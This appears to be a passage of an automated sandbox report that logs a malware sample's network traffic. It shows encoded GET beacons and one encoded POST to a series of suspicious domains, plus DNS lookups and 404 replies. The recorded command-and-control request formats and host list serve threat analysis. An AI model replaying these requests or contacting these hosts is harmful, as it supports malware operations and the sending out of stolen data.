                Source: global trafficHTTP traffic detected: GET /c2q3/?Z0WTZ=j/0mpNm2Bsp7DIZ0lL93uSEy3O7+v2qbjKVTngZW+fxoFlp5b+1ximLQJstL0djCplBlCo8niZKHcOIqzu0BFGSn0M5MS0dRMByh0HJ4/jaoTuMehM4oDS0=&SJuP9=UPQLWRgHAD_ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.7wkto5nk230724z.clickConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /w5is/?Z0WTZ=HbCgM9YcBMttwdZrXhLlY5z1HFkNRQK7DIvCaf9ftWyGunbQ91oOdhxta7T/vCia7UhAH45R/qaSwn7axWhs9/xB9a8/qr3Kz4jMxTKXhFTKb3+4TwbOFdg=&SJuP9=UPQLWRgHAD_ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.roopiedutech.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /mgme/?Z0WTZ=3lL/hypx1hmyWKcZLPPjI3y0DWzdh1Mqom9U/1xhTPLquFXOEtCOjeGYhH0PH+auVNiYKnzM9W/uk3mi7YblJuOSg3EBIys+/hhk110xaMRzC++YecO4bSA=&SJuP9=UPQLWRgHAD_ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.suree.betConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /4q66/?Z0WTZ=luPP4oyA+IxXa4dPaQ44uTX+yoj5Av033QMPVNIFYKC2UntJdFHOXwWAX/7zhXjIXLYqvWecISwtUHhz1+aJwbK46q/K1DU8OrPrV+gFHYeA3Gw8r5+flHs=&SJuP9=UPQLWRgHAD_ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.bocadolobopetra.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /wh1i/?Z0WTZ=NfOB86VXI4wsVz/XO9ACyDnBWrbPRq/QJ2w3Rs+6xYlcxVFOr5mbmHJ2iOb+4RiHynZrudFNXkx38yGLhxQe11Zee6oqKWgky3dD2swdesJmFdrAGLP7kwM=&SJuP9=UPQLWRgHAD_ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.44kdd.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /qgza/?Z0WTZ=qUfac4sEgcT1lV7He6HHqRuPwSXpeUZhJqCALOrqisMgJsMY6XUJFSDaK0uTR8zfEfRb7N0j/DnowCq79bdHl1fL6DN9OJHq4gCFNVkq5WVy1qGx7uu1RVo=&SJuP9=UPQLWRgHAD_ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.dbasky.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /icpx/?Z0WTZ=EWEf4eOOpXzvErl7RdF5qy2I3vzfoFn6qWFMKyXoxLDqmpyGz4laiprjdpsB5hfyQE5UJ9beIy4J0yBeSjcOCjXGgmEr9dkECjGb/w9fv9zko2b6bEiJ13U=&SJuP9=UPQLWRgHAD_ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.zoptra.infoConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /uhg3/?Z0WTZ=BYkW8sJ9y3cOHNEoRxCwA5Vo4ahPFjBVLPr9x2y6ZT42IcqGpiutRD9HR4qSfel6nhfbupoEu3BM2yJdNDd6onHQNeQ4qPh2tk8usD30jryO8epkJ7XZGNI=&SJuP9=UPQLWRgHAD_ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.nutrigenfit.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /pjcb/?SJuP9=UPQLWRgHAD_&Z0WTZ=mR41NwlPpWSeNv3ogRNiaiaxYZXyC1SkAJjbD/qSc2ukVSLu6jyn16P/AoWnmXjc847+20hqOz4nW3sR+UY1qAEpIZA0h6plj49hN8QYEBC/SES4lZybD8k= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.redex.funConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /51fd/?Z0WTZ=5XThc+sTNfSc1dyVCHius6QJlgyE7UD3g9QPrW9D0ZCA6InRQfgmSS7sY3ZsEANqCFm0SxAy1XScT67z0IieRfxf0Cr6BzHBArQcGKRuou4FU1nhplefNR0=&SJuP9=UPQLWRgHAD_ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.broork.sbsConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /t7p4/?SJuP9=UPQLWRgHAD_&Z0WTZ=l9a7eDheKRZy9bhcTeCHdToYa6mt3ij4C0pbULzToM8sx4gmKc4u2ZHXAvhfaYH7/T0zUvL9+kkqYwdWGnSBKq2rvPWRIuzqlymkkYj2zkimPtA3jZhNuM4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.deepfy.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /6byd/?Z0WTZ=cJlBP4gdQg33LxRaxIBB9TpDVwunrRcR6TPzX8fihpDKfN+C3z32iLCDUP2OAgtSF65Fjxsz3xegGgg43kjMMLGB+pU0EQVXDohFVmD6n/q0/xsVCvDFB+8=&SJuP9=UPQLWRgHAD_ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.cmdh1c.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficDNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
                Source: global trafficDNS traffic detected: DNS query: www.litsgs.vip
                Source: global trafficDNS traffic detected: DNS query: www.7wkto5nk230724z.click
                Source: global trafficDNS traffic detected: DNS query: www.roopiedutech.online
                Source: global trafficDNS traffic detected: DNS query: www.abistra.store
                Source: global trafficDNS traffic detected: DNS query: www.suree.bet
                Source: global trafficDNS traffic detected: DNS query: www.bocadolobopetra.net
                Source: global trafficDNS traffic detected: DNS query: www.44kdd.top
                Source: global trafficDNS traffic detected: DNS query: www.dbasky.net
                Source: global trafficDNS traffic detected: DNS query: www.zoptra.info
                Source: global trafficDNS traffic detected: DNS query: www.nutrigenfit.online
                Source: global trafficDNS traffic detected: DNS query: www.redex.fun
                Source: global trafficDNS traffic detected: DNS query: www.broork.sbs
                Source: global trafficDNS traffic detected: DNS query: www.deepfy.xyz
                Source: global trafficDNS traffic detected: DNS query: www.cmdh1c.xyz
                Source: global trafficDNS traffic detected: DNS query: www.beautyconcernsusa.net
                Source: unknownHTTP traffic detected: POST /c2q3/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-USHost: www.7wkto5nk230724z.clickOrigin: http://www.7wkto5nk230724z.clickReferer: http://www.7wkto5nk230724z.click/c2q3/Content-Length: 202Content-Type: application/x-www-form-urlencodedConnection: closeCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30Data Raw: 5a 30 57 54 5a 3d 75 39 63 47 71 39 4f 79 46 70 64 31 46 59 56 5a 74 59 59 4e 6d 51 77 4a 6d 35 6a 73 6a 7a 75 67 79 4c 4a 66 6b 6b 42 50 79 50 73 63 43 57 31 74 55 6f 31 74 73 53 50 52 4f 59 64 52 2f 63 47 61 77 77 78 5a 4f 37 59 51 74 62 2b 73 52 37 31 52 31 5a 35 78 64 30 4c 36 68 74 59 6a 58 41 30 57 42 57 43 73 77 33 77 74 79 6d 61 6b 66 76 73 7a 30 75 6b 67 55 41 73 6f 4f 75 6a 4c 57 44 71 31 45 68 46 71 7a 79 6a 4d 4d 44 72 74 76 52 73 74 58 6d 6f 2b 57 41 42 4b 55 72 4e 34 6e 57 4c 35 31 50 51 4b 6a 67 67 33 51 61 34 4c 6c 42 64 71 6b 68 70 57 45 67 53 53 33 44 77 41 66 39 43 79 2b 67 3d 3d Data Ascii: Z0WTZ=u9cGq9OyFpd1FYVZtYYNmQwJm5jsjzugyLJfkkBPyPscCW1tUo1tsSPROYdR/cGawwxZO7YQtb+sR71R1Z5xd0L6htYjXA0WBWCsw3wtymakfvsz0ukgUAsoOujLWDq1EhFqzyjMMDrtvRstXmo+WABKUrN4nWL51PQKjgg3Qa4LlBdqkhpWEgSS3DwAf9Cy+g==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 07:12:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N8qld3sJZua8iW44eBacmyrVtdW1%2B69AqDPd3JsInJMXWWTtZldHzWToibszvZ6J9eRZ1pcNgMz48DxSPRvFXL9g76BjQjF9rgNLjF7U%2BPVvSjgs3ai%2BtfWHwig8%2FiEhjFF%2FAHC74KjjnEKT"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dc25067df724761-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1875&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=810&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 36 33 0d 0a b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: f63(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 07:12:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w2woxl0lr2wvLQ83ITpXepXG2emJEoBc1c3dXr2ldsCtuSkOtQL3GS6CR%2FjMsWErS1qXNRCBo2G6vcdlTRyxt2W4TNF15y4P4%2BxmVfQkjEPv5anSWIcLbg%2F2iousDYnSNcd%2F6n8sng7D4wQ%2F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dc25077cacb4864-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1244&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=830&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 07:12:09 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YS9iQrxk9Uupw0402lvDL8x%2FW23y8bn4ehSLQm%2Bd%2FYCYlPS4Z3LZvL0M2gkiVUtHr1U9tgYBLvmN%2BqXN0CFIejZq9wMraSZ%2FLkqGdQ5h2dMLncpNEw6Fph2%2FnCHqVhGUGqKUxnYkmq5t8PQN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dc25087a9552cdc-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1400&sent=4&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10912&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 07:12:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OGqw%2BUFdXC2mDbOXxkbO%2FFXG5NQNNCzFDlz%2FPTyJQhqJFOen2iZf3EQWOr9%2Fo8cclF0QlbjY9%2BCuEooVoASZBHQcK0480xOckZuJpIrTJygysMNCqWLxaGoybH8xFLyeAcSpjvjkNcAL7HZK"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dc25097b8262857-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1649&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=534&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 07:13:09 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66df9c88-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 07:13:12 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66df9c88-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 07:13:12 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66df9c88-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 07:13:12 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66df9c88-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 07:13:12 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66df9c88-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 07:13:14 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66df9c88-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 07:13:17 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66df9c88-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 07:13:24 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 07:13:26 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 07:13:29 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
